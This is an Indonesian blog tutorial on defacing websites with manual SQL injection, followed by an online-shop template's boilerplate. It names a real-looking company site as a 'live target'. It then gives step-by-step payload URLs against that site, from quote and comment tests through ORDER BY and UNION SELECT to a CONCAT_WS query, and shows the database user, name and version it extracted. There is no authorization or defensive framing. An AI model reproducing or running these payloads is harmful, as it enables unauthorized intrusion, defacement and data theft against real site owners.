Tutorial Deface Dengan Cara SQL Injection Manual
Tutorial Deface Dengan Cara SQL Injection Manual

Tutorial Deface Dengan Cara SQL Injection Manual

 
kembali lagi bersama gue admin yg ganteng :v
Setelah sekian lama tidak posting artikel, ya maaf sibuk dengan sekolah ( adminnya masih sekolah gan ), teman, pelajaran , dan yang pasti pacar wwkwk

kali ini gue akan memberikan tutorial Deface Dengan Cara SQL Injection Manual
beberapa bulan lalu gue memberikan tutorial sqli dengan pakai SQLMAP, Nah sekarang gue memberikan caranya dengan cara manual

langsung aja ya gan, sans aja live target udh gue sediakan kok :D

LIVE TARGET : http://garudatransindonesia.com/artikel.php?id=9


1. Untuk inject nya lebih mudah pakai Mozilla firefox + hackbar ya :D

2. Masukkan payload ( ' ) *tanpa tanda kurung , di akhir URL, maka website akan blank, menandakan bahwa web tersebut vuln SQL Injection
http://garudatransindonesia.com/artikel.php?id=9'



3. Selanjutnya beri tanda ( -- - ) di akhir url, contoh seperti ini
http://garudatransindonesia.com/artikel.php?id=9'-- -
Jika web kembali menampilkan artikel secara normal, berarti vuln SQLI



4. Sekarang kita memakai order+by untuk mencari error nya dimana
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+2-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+5-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+6-- - = ERROR / BLANK



5. Karena order by error nya di nomor 6, sekarang kita union select , untuk mencari column nya di nomor berapa beri tanda ( . ) di belakang parameter nya
Union select di nomor 5, karena order by nya error di nomor 6
http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,2,3,4,5-- -


6. Yap udh ketemu ya nomor column nya yaitu di angka 2, sekarang kita mencari tau user, database , dan version nya, caranya? kita beri basic statement di menu hackbar kalian
Atau juga bisa memakai payload ini, taruh di letak angka 2
Payload = CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())

http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5-- -


7, Dan taraaaa, kita sudah mendapatkan user , database , dan version nya


User : u2232528_garudatrans@localhost
Database : u2232528_garuda
Version : 10.2.17-MariaDB

Untuk mencari table tablenya, tinggal hapus aja payload nya, lalu memakai DIOS yang tersedia di hackbar :D

Ok sekian...
Terimaasih sudah berkunjung
Tutorial Deface Dengan Cara SQL Injection Manual

Tutorial Deface Dengan Cara SQL Injection Manual

Pesan via WhatsApp! - Proses Pemesanan Mudah ( via WhatsApp ) Instan checkout, tanpa registrasi / login.

Pesan via WhatsApp!

Proses Pemesanan Mudah ( via WhatsApp ) Instan checkout, tanpa registrasi / login.

Pengiriman Fleksibel - Kami menyediakan Layanan Pesan - Ambil ( Pickup ) & Pesan - Antar ( Delivery )

Pengiriman Fleksibel

Kami menyediakan Layanan Pesan - Ambil ( Pickup ) & Pesan - Antar ( Delivery )

Metode Pembayaran Lengkap - Bayar via Bank Transfer, E-Wallet atau PayPal? Bisa banget!

Metode Pembayaran Lengkap

Bayar via Bank Transfer, E-Wallet atau PayPal? Bisa banget!

Toko WA+

Template Blogger dengan fitur Toko Online berbasis WhatsApp + Keranjang Pesanan yang berguna untuk membantu "Pebisnis Online" menjual Produk maupun Jasa secara Instan & Efisien.

Hubungi Kami

Jl. Alamat Toko, No. 123 - Bandung 40241
Phone / WhatsApp. +62 89618885066
E-mail. info@website.com

Tutorial Deface Dengan Cara SQL Injection Manual http://filingjoingly.blogspot.com/2018/12/tutorial-deface-dengan-cara-sql.html
( 0 ) 0